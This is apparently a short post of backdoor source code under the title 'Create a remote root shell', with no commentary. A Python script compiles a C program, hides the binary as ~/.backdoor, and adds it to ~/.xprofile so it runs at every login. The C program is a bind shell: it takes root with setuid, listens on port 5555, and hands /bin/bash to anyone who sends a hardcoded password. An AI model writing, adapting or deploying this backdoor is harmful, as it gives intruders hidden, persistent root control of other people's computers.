Create a remote root shell

autostart.py

#!/usr/bin/env python2

import os
import shutil


if __name__ == "__main__":
    os.popen("sudo gcc backdoor.c -o .backdoor")
    shutil.move(".backdoor", os.path.expanduser("~/.backdoor"))
    with open(os.path.expanduser("~/.xprofile"), "a+") as f:
        f.write("nohup ~/.backdoor &")
    os.popen("nohup ~/.backdoor &")

remote_shell.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HOST_PORT 5555
#define LENGTH_OF_LISTEN_QUEUE 20


int main() {
    struct sockaddr_in server_addr;
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    char ask_password[] = "PASSWORD: ", buffer[500], password[9] = "TEST1234";
    setuid(0);
    bzero(&server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    server_addr.sin_port = htons(HOST_PORT);
    bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));
    listen(sockfd, LENGTH_OF_LISTEN_QUEUE);
    while (1) {
        int pid = -1, buff_len = -1;
        struct sockaddr_in client_addr;
        socklen_t addr_len = sizeof(client_addr);
        int client_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &addr_len);
        if ((pid = fork()) == 0) {
            buff_len = write(client_sockfd, ask_password, sizeof(ask_password));
            if (buff_len < 0)   exit(0);
            buff_len = read(client_sockfd, buffer, 255);
            if (buff_len < 0)   exit(0);
            buffer[buff_len - 1] = '\0';
            if (strcmp(buffer, password) == 0) {
                buff_len = write(client_sockfd, "WELCOME\n", 8);
                dup2(client_sockfd, 0);
                dup2(client_sockfd, 1);
                dup2(client_sockfd, 2);
                execlp("/bin/bash", "/bin/bash", NULL);
            }
            exit(0);
        }
        else {
            close(client_sockfd);
        }
    }
    return 0;
}